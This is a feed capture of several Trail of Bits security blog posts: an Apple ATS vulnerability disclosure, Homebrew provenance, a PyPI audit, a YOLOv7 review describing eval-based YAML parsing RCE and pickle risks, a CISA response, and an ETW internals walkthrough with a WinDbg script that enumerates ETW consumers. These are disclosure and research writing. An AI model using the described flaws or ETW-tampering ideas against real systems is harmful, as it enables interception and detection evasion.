Normal view

There are new articles available, click to refresh the page.
Before yesterdayTrail of Bits Blog

The issue with ATS in Apple’s macOS and iOS

30 October 2023 at 12:00

By Will Brattain

Trail of Bits is publicly disclosing a vulnerability (CVE-2023-38596) that affects iOS, iPadOS, and tvOS before version 17, macOS before version 14, and watchOS before version 10. The flaw resides in Apple’s App Transport Security (ATS) protocol handling. We discovered that Apple’s ATS fails to require the encryption of connections to IP addresses and *.local hostnames, which can leave applications vulnerable to information disclosure vulnerabilities and machine-in-the-middle (MitM) attacks.

Note: Apple published an advisory on September 18, 2023 confirming that CVE-2023-38596 had been fixed.

Background

ATS is a network security feature enabled by default in applications linked against iOS 9+ and macOS 10.11+ software development kits (SDK). ATS requires the use of the Transport Layer Security (TLS) protocol for network connections made by an application. Before iOS version 10 and macOS version 10.12, ATS disallowed connections to .local domains and IP addresses by default but allowed for the configuration of exceptions. As of iOS version 10 and macOS version 10.12, connections to .local domains and IP addresses are allowed by default.

Proof of concept

We created a simple app protected by ATS that POSTs to a user-specified URL. The following table summarizes the tests we performed. Notably, to demonstrate the flaw in ATS’s protocol handing, we submitted POST requests to an unencrypted IP address and *.local domain and observed that the requests succeeded when they should not have, as shown in figure 1.

Note: The URL with the IP address (http://174.138.48.47/) and local domain (http://ats-poc.local) both map to http://ie.gy/.

Figure 1: We submitted POST requests to an unencrypted IP address (left) and *.local domain (right). Both requests succeeded.

This behavior demonstrates that ATS requirements are not enforced on requests to .local domains and IP addresses. Thus, network connections established by iOS and macOS apps through the URL Loading System may be susceptible to information disclosure vulnerabilities and MitM attacks—both of which pose a risk to the confidentiality and integrity of transmitted data.

An exploit scenario

An app is designed to securely transfer data to WebDAV servers. The app relies on ATS to ensure that traffic to user-provided URLs (WebDAV servers) is protected using encryption. When a URL is added, the app makes a request to it, and if ATS does not block the connection, it is assumed to be safe.

A user unwittingly adds a URL and specifies the IP address (e.g., http://174.138.48.47/) on the form, which is allowed by ATS even if it’s not encrypted. The user then accesses the URL from an insecure network, such as a mall WiFi. Because the traffic is not encrypted, a malicious user who is able to capture the network traffic is able to access all data sent to the server, including basic auth credentials, which in turn enable the attacker to recover all sensitive data stored on the WebDAV server that is accessible to the compromised user.

Check your apps!

Now that Apple has forced encryption to .local and IP addresses, developers should check that their app continues to work if they rely on those addresses.

Coordinated disclosure

As part of the disclosure process, we reported the vulnerabilities to Apple first. The timeline of disclosure is provided below:

  • October 21, 2022: Discovered ATS vulnerability.
  • November 3, 2022: Disclosed the vulnerability to Apple and communicated that we planned to publicly disclose on December 5.
  • November 14, 2022: Apple requested delay to February 2023; we requested details about why the delay was necessary.
  • November 16, 2022: Agreed to delay after Apple explained their internal testing and validation processes.
  • November 28, 2022: Requested a status update from Apple.
  • November 29, 2022: Apple confirmed that they were still investigating the vulnerability.
  • December 9, 2022: Apple confirmed and continued investigation.
  • January 31, 2023: Delayed release due to potential impact to apps/developers.
  • March 31, 2023: Requested a status update from Apple.
  • April 10, 2023: Apple indicated they were preparing an update regarding the remediation timeline.
  • April 18, 2023: Fix indicated that a fix would be ready for post-WWDC beta release.
  • September 18, 2023: Apple published an advisory confirming that CVE-2023-38596 had been fixed.

Adding build provenance to Homebrew

6 November 2023 at 13:00

By William Woodruff

This is a joint post with Alpha-Omega—read their announcement post as well!

We’re starting a new project in collaboration with Alpha-Omega and OpenSSF to improve the transparency and security of Homebrew. This six-month project will bring cryptographically verifiable build provenance to homebrew-core, allowing end users and companies to prove that Homebrew’s packages come from the official Homebrew CI/CD. In a nutshell, Homebrew’s packages will become compliant with SLSA Build L2 (formerly known as Level 2).

As the dominant macOS package manager and popular userspace alternative on Linux, Homebrew facilitates hundreds of millions of package installs per year, including development tools and toolchains that millions of programmers rely on for trustworthy builds of their software. This critical status makes Homebrew a high-profile target for supply chain attacks, which this project will help stymie.

Vulnerable links in the supply chain

The software supply chain is built from individual links, and the attacker’s goal is to break the entire chain by finding and subverting the weakest link. Conversely, the defender aims to strengthen every link because the attacker needs to break only one to win.

Previous efforts to strengthen the entire chain have focused on various links:

  • The security of the software itself: static and dynamic analyses, as well as the rise of programming languages intended to eliminate entire vulnerability classes
  • Transport security: the use of HTTPS and other authenticated, integrity-preserving channels for retrieving and publishing software artifacts
  • Packaging index and manager security: the adoption of 2FA by package indices, as well as technologies like PyPI’s Trusted Publishing for reducing the “blast radius” of package publishing workflows

With this post, we’d like to spotlight another link that urgently needs strengthening: opaque and complex build processes.

Taming beastly builds with verifiable provenance

Software grows in complexity over time, and builds are no exception; modern build processes contain all the indications of a weak link in the software supply chain:

  • Opaque, unauditable build hosts: Much of today’s software is built on hosted CI/CD services, forming an implicit trust relationship. These services inject their dependencies into the build environment and change constantly—often for important reasons, such as patching vulnerable software.
  • Large, dense dependency graphs: We rely more than ever on small third-party dependencies, often maintained (or not) by hobbyists with limited interest or experience in secure development. The pace of development we’ve come to expect necessitates this dense web of small dependencies. Still, their rise (along with the rise of automatic dependency updating) means that all our projects contain dozens of left-pad incidents waiting to happen.
  • Complex, unreproducible build systems and processes: Undeclared and implicit dependencies, environments that cannot be reproduced locally, incorrect assumptions, and race conditions are just a few of the ways in which builds can misbehave or fail to reproduce, leaving engineers in the lurch. These reliability and usability problems are also security problems in our world of CI/CD and real-time security releases.

Taming these complexities requires visibility into them. We must be able to enumerate and formally describe the components of our build systems to analyze them automatically. This goes by many names and covers many techniques (SBOMs, build transparency, reproducibility, etc.), but the basic idea is one of provenance.

At the same time, collecting provenance adds a new link to our chain. Without integrity and authenticity protections, provenance is just another piece of information that an attacker could potentially manipulate.

This brings us to our ultimate goal: provenance that we can cryptographically verify, giving us confidence in our claims about a build’s origin and integrity.

Fortunately, all the building blocks for verifiable provenance already exist: Sigstore gives us strong digital signatures bound to machine (or human) identities, DSSE and in-toto offer standard formats and signing procedures for crafting signed attestations, and SLSA provides a formal taxonomy for evaluating the strength and trustworthiness of our statements.

Verifiable provenance for Homebrew

What does this mean for Homebrew? Once complete, every single bottle provided by homebrew-core will be digitally signed in a way that attests it was built on Homebrew’s trusted CI/CD. Those digital signatures will be provided through Sigstore; the attestations behind them will be performed with the in-toto attestation framework.

Even if an attacker manages to compromise Homebrew’s bottle hosting or otherwise tamper with the contents of the bottles referenced in the homebrew-core formulas, they cannot contrive an authentic digital signature for their changes.

This protection complements Homebrew’s existing integrity and source-side authenticity guarantees. Once provenance on homebrew-core is fully deployed, a user who runs brew install python will be able to prove each of the following:

  1. The formula metadata used to install Python is authenticated, thanks to Homebrew’s signed JSON API.
  2. The bottle has not been tampered with in transit, thanks to digests in the formula metadata.
  3. The bottle was built in a public, auditable, controlled CI/CD environment against a specific source revision.

That last property is brand new and is equivalent to Build L2 in the SLSA taxonomy of security levels.

Follow along!

This work is open source and will be conducted openly, so you can follow our activity. We are actively involved in the Sigstore and OpenSSF Slacks, so please drop in and say hi!

Alpha-Omega, an associated project of OpenSSF, is funding this work. The Alpha-Omega mission is to protect society by catalyzing sustainable security improvements to the most critical open-source software projects and ecosystems. OpenSSF holds regularly scheduled meetings for its working groups and projects, and we’ll be in attendance.

Our audit of PyPI

14 November 2023 at 13:00

By William Woodruff

This is a joint post with the PyPI maintainers; read their announcement here!

This audit was sponsored by the Open Tech Fund as part of their larger mission to secure critical pieces of internet infrastructure. You can read the full report in our Publications repository.

Late this summer, we performed an audit of Warehouse and cabotage, the codebases that power and deploy PyPI, respectively. Our review uncovered a number of findings that, while not critical, could compromise the integrity and availability of both. These findings reflect a broader trend in large systems: security issues largely correspond to places where services interact, particularly where those services have insufficiently specified or weak contracts.

PyPI

PyPI is the Python Package Index: the official and primary packaging index and repository for the Python ecosystem. It hosts half a million unique Python packages uploaded by 750,000 unique users and serves over 26 billion downloads every single month. (That’s over three downloads for every human on Earth, each month, every month!)

Consequently, PyPI’s hosted distributions are essentially the ground truth for just about every program written in Python. Moreover, PyPI is extensively mirrored across the globe, including in countries with limited or surveilled internet access.

Before 2018, PyPI was a large and freestanding legacy application with significant technical debt that accumulated over nearly two decades of feature growth. An extensive rewrite was conducted from 2016 to 2018, culminating in the general availability of Warehouse, the current codebase powering PyPI.

Various significant feature enhancements have been performed since then, including the addition of scoped API tokens, TOTP- and WebAuthn-based MFA, organization accounts, secret scanning, and Trusted Publishing.

Our audit and findings

Under the hood, PyPI is built out of multiple components, including third-party dependencies that are themselves hosted on PyPI. Our audit focused on two of its most central components:

  • Warehouse: PyPI’s “core” back end and front end, including the majority of publicly reachable views on pypi.org, as well as the PEP 503 index, public REST and XML-RPC APIs, and administrator interface
  • cabotage: PyPI’s continuous deployment infrastructure, enabling GitOps-style deployment by the PyPI administrators

Warehouse

We performed a holistic audit of Warehouse’s codebase, including the relatively small amount of JavaScript served to browser clients. Some particular areas of focus included:

  • The “legacy” upload endpoint, which is currently the primary upload mechanism for package submission to PyPI;
  • The administrator interface, which allows admin-privileged users to perform destructive and sensitive operations on the production PyPI instance;
  • All user and project management views, which allow their respectively privileged users to perform destructive and sensitive operations on PyPI user accounts and project state;
  • Warehouse’s AuthN, AuthZ, permissions, and ACL schemes, including the handling and adequate permissioning of different credentials (e.g., passwords, API tokens, OIDC credentials);
  • Third-party service integrations, including integrations with GitHub secret scanning, the PyPA Advisory Database, email delivery and state management through AWS SNS, and external object storages (Backblaze B2, AWS S3);
  • All login and authentication flows, including TOTP and WebAuthn-based MFA flows as well as account recovery and password reset flows.

During our review, we uncovered a number of findings that, while not critical, could potentially compromise Warehouse’s availability, integrity, or the integrity of its hosted distributions. We also uncovered a finding that would allow an attacker to disclose ordinarily private account information. Following a post-audit fix review, we believe that each of these findings has been mitigated sufficiently or does not pose an immediate risk to PyPI’s operations.

Findings of interest include:

  • TOB-PYPI-2: weak signature verification could allow an attacker to manipulate PyPI’s AWS SNS integration, including topic subscriptions and bounce/complaint notices against individual user emails.
  • TOB-PYPI-5: an attacker could use an unintentional information leak on the upload endpoint as a reconnaissance oracle, determining account validity without triggering ordinary login attempt events.
  • TOB-PYPI-14: an attacker with access to one or more of PyPI’s object storage services could cause cache poisoning or confusion due to weak cryptographic hashes.

Our overall evaluation of Warehouse is reflected in our report: Warehouse’s design and development practices are consistent with industry-standard best practices, including the enforcement of ordinarily aspirational practices such as 100% branch coverage, automated quality and security linting, and dependency updates.

cabotage

Like with Warehouse, our audit of cabotage was holistic. Some particular areas of focus included:

  • The handling of GitHub webhooks and event payloads, including container and build dispatching logic based on GitHub events;
  • Container and image build and orchestration;
  • Secrets handling and log filtering;
  • The user-facing cabotage web application, including all form and route logic.

During our review, we uncovered a number of findings that, while not critical, could potentially compromise cabotage’s availability and integrity, as well as the availability and integrity of the containers that it builds and deploys. We also uncovered two findings that could allow an attacker to circumvent ordinary access controls or log filtering mechanisms. Following a post-audit fix review, we believe that these findings have been mitigated sufficiently or do not pose an immediate risk to PyPI’s operations (or other applications deployed through cabotage).

Findings of interest include:

  • TOB-PYPI-17: an attacker with build privileges on cabotage could potentially pivot into backplane control of Caborage itself through command injection.
  • TOB-PYPI-19: an attacker with build privileges on cabotage could potentially pivot into backplane control of cabotage itself through a crafted hosted application Procfile.
  • TOB-PYPI-20: an attacker with deployment privileges on cabotage could potentially deploy a legitimate-looking-but-inauthentic image due to GitHub commit impersonation.

From the report, our overall evaluation is that cabotage’s codebase is not as mature as Warehouse’s. In particular, our evaluation reflects operational deficiencies that are not shared with Warehouse: cabotage has a single active maintainer, has limited available public documentation, does not have a complete unit test suite, and does not use CI/CD system to automatically run tests or evaluate code quality metrics.

Takeaways

Unit testing, automated linting, and code scanning are all necessary components in a secure software development lifecycle. At the same time, as our full report demonstrates, they cannot guarantee the security of a system or design: manual code review remains invaluable for catching interprocedural and systems-level flaws.

We worked closely with the PyPI maintainers and administrators throughout the audit and would like to thank them for sharing their extensive knowledge and expertise, as well as for actively triaging reports submitted to them. In particular, we would like to thank Mike Fiedler, the current PyPI Safety & Security Engineer, for his documentation and triage efforts before, during, and after the engagement period.

Assessing the security posture of a widely used vision model: YOLOv7

15 November 2023 at 15:15

By Alvin Crighton, Anusha Ghosh, Suha Hussain, Heidy Khlaaf, and Jim Miller

TL;DR: We identified 11 security vulnerabilities in YOLOv7, a popular computer vision framework, that could enable attacks including remote code execution (RCE), denial of service, and model differentials (where an attacker can trigger a model to perform differently in different contexts).

Open-source software provides the foundation of many widely used ML systems. However, these frameworks have been developed rapidly, often at the cost of secure and robust practices. Furthermore, these open-source models and frameworks are not specifically intended for critical applications, yet they are being adopted for such applications at scale, through momentum or popularity. Few of these software projects have been rigorously reviewed, leading to latent risks and a rise of unidentified supply chain attack surfaces that impact the confidentiality, integrity, and availability of the model and its associated assets. For example, pickle files, used widely in the ML ecosystem, can be exploited to achieve arbitrary code execution

Given these risks, we decided to assess the security of a popular and well-established vision model: YOLOv7. This blog post shares and discusses the results of our review, which comprised a lightweight threat model and secure code review, including our conclusion that the YOLOv7 codebase is not suitable for mission-critical applications or applications that require high availability. A link to the full public report is available here.

Disclaimer: YOLOv7 is a product of academic work. Academic prototypes are not intended to be production-ready nor have appropriate security hygiene, and our review is not intended as a criticism of the authors or their development choices. However, as with many ML prototypes, they have been adopted within production systems (e.g., as YOLOv7 is promoted by Roboflow, with 3.5k forks). Our review is only intended to bring to light the risks of using such prototypes without further security scrutiny.

As part of our responsible disclosure policy, we contacted the authors of the YOLOv7 repository to make them aware of the issues we identified. We did not receive a response, but we propose concrete solutions and changes that would mitigate the identified security gaps.

What is YOLOv7?

You Only Look Once (YOLO) is a state-of-the-art, real-time object detection system whose combination of high accuracy and good performance has made it a popular choice for vision systems embedded in mission-critical applications such as robotics, autonomous vehicles, and manufacturing. YOLOv1 was initially developed in 2015; its latest version, YOLOv7, is the open-source codebase revision of YOLO developed by Academia Sinica that implements their corresponding academic paper, which outlines how YOLOv7 outperforms both transformer-based object detectors and convolutional-based object detectors (including YOLOv5).

The codebase has over 3k forks and allows users to provide their own pre-trained files, model architecture, and dataset to train custom models. Even though YOLOv7 is an academic project, YOLO is the de facto algorithm in object detection, and is often used commercially and in mission-critical applications (e.g., by Roboflow).

What we found

Our review identified five high-severity and three medium-severity findings, which we attribute to the following insecure practices: 

  • The codebase is not written defensively; it has no unit tests or testing framework, and inputs are poorly validated and sanitized.
  • Complete trust is placed in model and configuration files that can be pulled from external sources.
  • The codebase dangerously and unnecessarily relies on permissive functions in ways that introduce vectors for RCE. 

The table below summarizes our high-severity findings:

**It is common practice to download datasets, model pickle files, and YAML configuration files from external sources, such as PyTorch Hub. To compromise these files on a target machine, an attacker could upload a malicious file to one of these public sources.

Building the threat model

For our review, we first carried out a lightweight threat model to identify threat scenarios and the most critical components that would in turn inform our code review. Our approach draws from Mozilla’s “Rapid Risk Assessment” methodology and NIST’s guidance on data-centric threat modeling (NIST 800-154). We reviewed YOLO academic papers, the YOLOv7 codebase, and user documentation to identify all data types, data flow, trust zones (and their connections), and threat actors. These artifacts were then used to develop a comprehensive list of threat scenarios that document each of the possible threats and risks present in the system.

The threat model accounts for the ML pipeline’s unique architecture (relative to traditional software systems), which introduces novel threats and risks due to new attack surfaces within the ML lifecycle and pipeline such as data collection, model training, and model inference and deployment. Corresponding threats and failures can lead to the degradation of model performance, exploitation of the collection and processing of data, and manipulation of the resulting outputs. For example, downloading a dataset from an untrusted or insecure source can lead to dataset poisoning and model degradation.

Our threat model thus aims to examine ML-specific areas of entry as well as outline significant sub-components of the YOLOv7 codebase. Based on our assessment of YOLOv7 artifacts, we constructed the following data flow diagram.

Figure 1: Data flow diagram produced during the lightweight threat model

Note that this diagram and our threat model do not target a specific application or deployment environment. Our identified scenarios were tailored to bring focus to general ML threats that developers should consider before deploying YOLOv7 within their ecosystem. We identified a total of twelve threat scenarios pertaining to three primary threats: dataset compromise, host compromise, and YOLO process compromise (such as injecting malicious code into the YOLO system or one of its dependencies).

Code review results

Next, we performed a secure code review of the YOLOv7 codebase, focusing on the most critical components identified in the threat model’s threat scenarios. We used both manual and automated testing methods; our automated testing tools included Trail of Bits’ repository of custom Semgrep rules, which target the misuse of ML frameworks such as PyTorch and which identified one security issue and several code quality issues in the YoloV7 codebase. We also used the TorchScript automatic trace checking tool to automatically detect potential errors in traced models. Finally, we used the public Python CodeQL queries across the codebase and identified multiple code quality issues.

In total, our code review resulted in the discovery of twelve security issues, five of which are high severity. The review also uncovered twelve code quality findings that serve as recommendations for enhancing the quality and readability of the codebase and preventing the introduction of future vulnerabilities.

All of these findings are indicative of a system that was not written or designed with a defensive lens:

  • Five security issues could individually lead to RCE, most of which are caused by the unnecessary and dangerous use of permissive functions such as subprocess.check_output, eval, and os.system. See the highlight below for an example. 
  • User and external data inputs are poorly validated and sanitized. Multiple issues enable a denial-of-service attack if an end user can control certain inputs, such as model files, dataset files, or configuration files (TOB-YOLO-9, TOB-YOLO-8, TOB-YOLO-12). For example, the codebase allows engineers to provide their own configuration files, whether they represent a different model architecture or are pre-trained files (given the different applications of the YOLO model architecture). These files and datasets are loaded into the training network where PyTorch is used to train the model. For a more secure design, the amount of trust placed into external inputs needs to be drastically reduced, and these values need to be carefully sanitized and validated.
  • There are currently no unit tests or any testing framework in the codebase (TOB-YOLO-11). A proper testing framework would have prevented some of the issues we uncovered, and without this framework it is likely that other implementation flaws and bugs exist in the codebase. Moreover, as the system continues to evolve, without any testing, code regressions are likely to occur.

Below, we highlight some of the details of our high severity findings and discuss their repercussions on ML-based systems.

Secure code review highlight #1: How YAML parsing leads to RCE

Our most notable finding regards the insecure parsing of YAML files that could result in RCE. Like many ML systems, YOLO uses YAML files to specify the architecture of models. Unfortunately, the YAML parsing function, parse_model, parses the contents of the file by calling eval on unvalidated contents of the file, as shown in this code snippet:

Figure 2: Snippet of parse_model in models/yolo.py

If an attacker is able to manipulate one of these YAML files used by a target user, they could inject malicious code that would be executed during this parsing. This is particularly concerning since these YAML files are often obtained from third-party websites that host these files along with other model files and datasets. A sophisticated attacker could compromise one of these third-party services or hosted assets. However, this issue can be detected through proper inspection of these YAML files, if done closely and often.

Given the potential severity of this finding, we proposed an alternative implementation as a mitigation: remove the need for the parse_model function altogether by rewriting the given architectures defined in config files as different block classes that call standard PyTorch modules. This rewrite serves a few different purposes:

  • It removes the inherent vulnerability present in calling eval on unsanitized input.
  • The block class structure more effectively replicates the architecture proposed in the implemented paper, allowing for easier replication of the given architecture and definition of subsequent iterations of similar structures.
  • It presents a more extensible base to continue defining configurations, as the classes are easily modifiable based on different parameters set by the user.

Our proposed fix can be tracked here.

Secure code review highlight #2: ML-specific vulnerabilities and improvements

As previously noted, ML frameworks are leading to a rise of novel attack avenues targeting confidentiality, integrity, and availability of the model and its associated assets. Highlights from the ML-specific issues that we uncovered during our security assessment include the following:

  • The YOLOv7 codebase uses pickle files to store models and datasets; these files have not been verified and may have been obtained from third-party sources. We previously found that the widespread use of pickle files in the ML ecosystem is a security risk, as pickle files enable arbitrary code execution. To deserialize a pickle file, a virtual machine known as the Pickle Machine (PM) interprets the file as a sequence of opcodes. Two opcodes contained in the PM, GLOBAL and REDUCE, can execute arbitrary Python code outside of the PM, thereby enabling arbitrary code execution. We built and released fickling, a tool to reverse engineer and analyze pickle files; however, we further recommend that ML implementations use safer file formats instead such as safetensors.
  • The way YOLOv7 traces its models could lead to model differentials—that is, the traced model that is being deployed behaves differently from the original, untraced model. In particular, YOLO uses PyTorch’s torch.jit.trace to convert its models into the TorchScript format for deployment. However, the YOLOv7 models contain many tracer edge cases: elements of the model that are not accurately captured by tracing. The most notable occurrence was the inclusion of input-dependent control flow. We used TorchScript’s automatic trace checker to confirm this divergence by generating an input that had different outputs depending on whether or not the model was traced, which could lead to backdoors. An attacker could release a model that exhibits a specific malicious behavior only when it is traced, making it harder to catch.

Specific recommendations and mitigations are outlined in our report.

Enhancing YOLOv7’s security

Beyond the identified code review issues, a series of design and operational changes are needed to ensure sufficient security posture. Highlights from the list of strategic recommendations provided in our report include:

  • Implementing an adequate testing framework with comprehensive unit tests and integration tests
  • Removing the use of highly permissive functions, such as subprocess.check_output, eval, and os.system
  • Improving development process of the codebase 
  • Enforcing the usage of secure protocols, such as HTTPS and RMTPS, when available
  • Continuously updating dependencies to ensure upstream security fixes are applied
  • Providing documentation to users about the potential threats when using data from untrusted training data or webcam streams

Although the identified security gaps may be acceptable for academic prototypes, we do not recommend using YOLOv7 within mission-critical applications or domains, despite existing use cases. For affected end users who are already using and deploying YOLOv7, we strongly recommend disallowing end users from providing datasets, model files, configuration files, and any other type of external inputs until the recommended changes are made to the design and maintenance of YOLOv7.

Coordinated disclosure timeline

As part of the disclosure process, we reported the vulnerabilities to the YOLOv7 maintainers first. Despite multiple attempts, we were not able to establish contact with the maintainers in order to coordinate fixes for these vulnerabilities. As a result, at the time of this blog post being released, the identified issues remain unfixed. As mentioned, we have proposed a fix to one of the issues that is being tracked here. The timeline of disclosure is provided below:

  • May 24, 2023: We notified the YOLOv7 maintainers that we intend to review the YOLOv7 codebase for internal purposes and invited them to participate and engage in our audit.
  • June 9, 2023: We notified the maintainers that we have begun the audit, and again invited them to participate and engage with our efforts.
  • July 10, 2023: We notified the maintainers that we had several security findings and requested engagement to discuss them.
  • July 26, 2023: We informed the maintainers of our official security disclosure notice with a release date of August 21, 2023.
  • November 15, 2023: The disclosure blog post was released and issues were filed with the original project repository.

How CISA can improve OSS security

20 November 2023 at 14:35

By Jim Miller

The US government recently issued a request for information (RFI) about open-source software (OSS) security. In this blog post, we will present a summary of our response and proposed solutions. Some of our solutions include rewriting widely used legacy code in memory safe languages such as Rust, funding OSS solutions to improve compliance, sponsoring research and development of vulnerability tracking and analysis tools, and educating developers on how to reduce attack surfaces and manage complex features.

Background details

The government entities responsible for the RFI were the Office of the National Cyber Director (ONCD), Cybersecurity Infrastructure Security Agency (CISA), National Science Foundation (NSF), Defense Advanced Research Projects Agency (DARPA), and Office of Management and Budget (OMB). The specific objective of this RFI was to gather public comments on future priorities and long-term areas of focus for OSS security. This RFI is a key part of the ongoing efforts by these organizations to identify systemic risks in OSS and foster the long-term sustainability of OSS communities.

The RFI includes five potential areas for long-term focus and prioritization. In response to this request, we are prioritizing the “Securing OSS Foundations” area and each of its four sub-areas: fostering the adoption of memory-safe programming languages, strengthening software supply chains, reducing entire classes of vulnerabilities at scale, and advancing developer education. We will provide suggested solutions for each of these four sub-areas below.

Fostering the adoption of memory-safe programming languages

Memory corruption vulnerabilities remain a grave threat to OSS security. This is demonstrated by the number and impact of several vulnerabilities such as the recent heap buffer overflow in libwebp, which was actively being exploited while we drafted our RFI response. Exploits such as these illustrate the need for solutions beyond runtime mitigations, and languages like Rust, which provide both memory and type safety, are the most promising.

In addition to dramatically reducing vulnerabilities, Rust also blends well with legacy codebases, offers high performance, and is relatively easy to use. Thus, our proposed solution centers on sponsoring strategic rewrites of important legacy codebases. Since rewrites are very costly, we specifically recommend undertaking a comprehensive and systematic analysis to identify the most suitable OSS candidates for transitioning to memory-safe languages like Rust. We propose a strong focus on software components that are widely used, poorly covered by tests, and prone to such memory safety vulnerabilities.

Strengthening software supply chains

Supply chain attacks, as demonstrated by the 2020 SolarWinds hack, represent another significant risk to OSS security. Supply chain security is a complex and multifaceted problem. Therefore, we propose improving protections across the entire software supply chain—from individual developers, to package indices, to downstream users.

Our suggested strategy includes establishing “strong link” guidelines that CISA could release. These would provide guidance for each of the critical OSS components: OSS developers, repository hosts, package indices, and consumers. In addition to this guidance, we also propose funding OSS solutions that better enable compliance, such as improving software bill of materials (SBOM) fidelity by integrating with build systems.

Reducing entire classes of vulnerabilities at scale

Another area of focus should be on large-scale reduction of vulnerabilities in the OSS ecosystem. Efforts such as OSS-Fuzz have successfully mitigated thousands of potential security issues, and we propose funding similar projects using this as a model. In addition, vulnerability tracking tools (like cargo-audit and pip-audit) have been successful at quickly remediating vulnerabilities that affect a wide number of users. A critical part of effectively maintaining these tools is properly maintaining the vulnerability database and not allowing over-reporting of insignificant security issues that could result in security fatigue, where developers ignore alerts because there are too many to process.

Therefore, our proposed solution is sponsoring the development and maintenance of tools for vulnerability tracking, analysis tools like Semgrep and CodeQL, and other novel techniques that could work at scale. We also recommend sponsoring research pertaining to novel tools and techniques to help solve specific high-value problems, such as secure HTTP parsing.

Advancing developer education

Lastly, we believe that improving developer education is an important long-term focus area for OSS security. In contrast to current educational efforts, which focus primarily on common vulnerabilities, we propose fostering an extension of developer education that covers areas like reducing attack surfaces, managing complex features, and “shifting left.” If done effectively, creating documentation and training materials specifically for these areas could have a substantially positive, long-term impact on OSS security.

Looking ahead

Addressing OSS security can be a complex challenge, but by making targeted interventions in these four areas, we can make significant improvements. We believe the US government can maximize impact through a combination of three strategies: provisioning comprehensive guidance, allocating funding through agencies like DARPA and ONR, and fostering collaboration with OSS foundations like OSTIF, OTF, and OpenSSF. This combined approach will enable the sponsorship and monetary support necessary to drive the research and engineering tasks outlined in our proposed solutions.

Together, these actions can build a safer future for open-source software. We welcome the initiative by ONCD, CISA, NSF, DARPA, and OMB for fostering such an open discussion and giving us the chance to contribute.

We welcome you to read our full response.

ETW internals for security research and forensics

22 November 2023 at 12:00

By Yarden Shafir

Why has Event Tracing for Windows (ETW) become so pivotal for endpoint detection and response (EDR) solutions in Windows 10 and 11? The answer lies in the value of the intelligence it provides to security tools through secure ETW channels, which are now also a target for offensive researchers looking to bypass detections.

In this deep dive, we’re not just discussing ETW’s functionalities; we’re exploring how ETW works internally so you can conduct novel research or forensic analysis on a system. Security researchers and malware authors already target ETW. They have developed several techniques to tamper with or bypass ETW-based EDRs, hook system calls, or gain access to ETW providers normally reserved for anti-malware solutions. Most recently, the Lazarus Group bypassed EDR detection by disabling ETW providers. Here, we’ll explain how ETW works and what makes it such a tempting target, and we’ll embark on an exciting journey deep into Windows.

Overview of ETW internals

Two main components of ETW are providers and consumers. Providers send events to an ETW globally unique identifier (GUID), and the events are written to a file, a buffer in memory, or both. Every Windows system has hundreds or thousands of providers registered. We can view available providers by running the command logman query providers:

By checking my system, we can see there are nearly 1,200 registered providers:

Each of these ETW providers defines its own events in a manifest file, which is used by consumers to parse provider-generated data. ETW providers may define hundreds of different event types, so the amount of information we can get from ETW is enormous. Most of these events can be seen in Event Viewer, a built-in Windows tool that consumes ETW events. But you’ll only see some of the data. Not all logs are enabled by default in Event Viewer, and not all event IDs are shown for each log.

On the other side we have consumers: trace logging sessions that receive events from one or several providers. For example, EDRs that rely on ETW data for their detection will consume events from security-related ETW channels such as the Threat Intelligence channel.

We can look at all running ETW consumers via Performance Monitor; clicking one of the sessions will show the providers it subscribes to. (You may need to run as SYSTEM to see all ETW logging sessions.)

The list of processes that receive events from this log session is useful information but not easy to obtain. As far as I could see there is no way to get that information from user mode at all, and even from kernel mode it’s not an easy task unless you are very familiar with ETW internals. So we will see what we can learn from a kernel debugging session using WinDbg.

Finding ETW consumer processes

There are ways to find consumers of ETW log sessions from user mode. However, they only supply very partial information that isn’t enough in all cases. So instead, we’ll head to our kernel debugger session. One way to get information about ETW sessions from the debugger is using the built-in extension !wmitrace. This extremely useful extension allows users to investigate all of the running loggers and their attributes, consumers, and buffers. It even allows users to start and stop log sessions (on a live debugger connection). Still, like all legacy extensions, it has its limitations: it can’t be easily automated, and since it’s a precompiled binary it can’t be extended with new functionality.

So instead we’ll write a JavaScript script—scripts are easier to extend and modify, and we can use them to get as much data as we need without being limited to the preexisting functionality of a legacy extension.

Every handle contains a pointer to an object. For example, a file handle will point to a kernel structure of type FILE_OBJECT. A handle to an object of type EtwConsumer will point to an undocumented data structure called ETW_REALTIME_CONSUMER. This structure contains a pointer to the process that opened it, events that get notified for different actions, flags, and also one piece of information that will (eventually) lead us back to the log session—LoggerId. Using a custom script, we can scan the handle tables of all processes for handles to EtwConsumer objects. For each one, we can get the linked ETW_REALTIME_CONSUMER structure and print the LoggerId:

"use strict";

function initializeScript()
{
    return [new host.apiVersionSupport(1, 7)];
}


function EtwConsumersForProcess(process)
{
    let dbgOutput = host.diagnostics.debugLog;
    let handles = process.Io.Handles;

    try 
    {
        for (let handle of handles)
        {
            try
            {
                let objType = handle.Object.ObjectType;
                if (objType === "EtwConsumer")
                {
                    let consumer = host.createTypedObject(handle.Object.Body.address, "nt", "_ETW_REALTIME_CONSUMER");
                    let loggerId = consumer.LoggerId;

                    dbgOutput("Process ", process.Name, " with ID ", process.Id, " has handle ", handle.Handle, " to Logger ID ", loggerId, "\n");
                }
            } catch (e) {
                dbgOutput("\tException parsing handle ", handle.Handle, "in process ", process.Name, "!\n");
            }
        }
    } catch (e) {

    }
}

Next, we load the script into the debugger with .scriptload and call our function to identify which process consumes ETW events:

dx @$cursession.Processes.Select(p => @$scriptContents.EtwConsumersForProcess(p))
@$cursession.Processes.Select(p => @$scriptContents.EtwConsumersForProcess(p))                
Process svchost.exe with ID 0x558 has handle 0x7cc to Logger ID 31
Process svchost.exe with ID 0x114c has handle 0x40c to Logger ID 36
Process svchost.exe with ID 0x11f8 has handle 0x2d8 to Logger ID 17
Process svchost.exe with ID 0x11f8 has handle 0x2e8 to Logger ID 3
Process svchost.exe with ID 0x11f8 has handle 0x2f4 to Logger ID 9
Process NVDisplay.Container.exe with ID 0x1478 has handle 0x890 to Logger ID 38
Process svchost.exe with ID 0x1cec has handle 0x1dc to Logger ID 7
Process svchost.exe with ID 0x1d2c has handle 0x780 to Logger ID 8
Process CSFalconService.exe with ID 0x1e54 has handle 0x760 to Logger ID 3
Process CSFalconService.exe with ID 0x1e54 has handle 0x79c to Logger ID 45
Process CSFalconService.exe with ID 0x1e54 has handle 0xbb0 to Logger ID 10
Process Dell.TechHub.Instrumentation.SubAgent.exe with ID 0x25c4 has handle 0xcd8 to Logger ID 41
Process Dell.TechHub.Instrumentation.SubAgent.exe with ID 0x25c4 has handle 0xdb8 to Logger ID 35
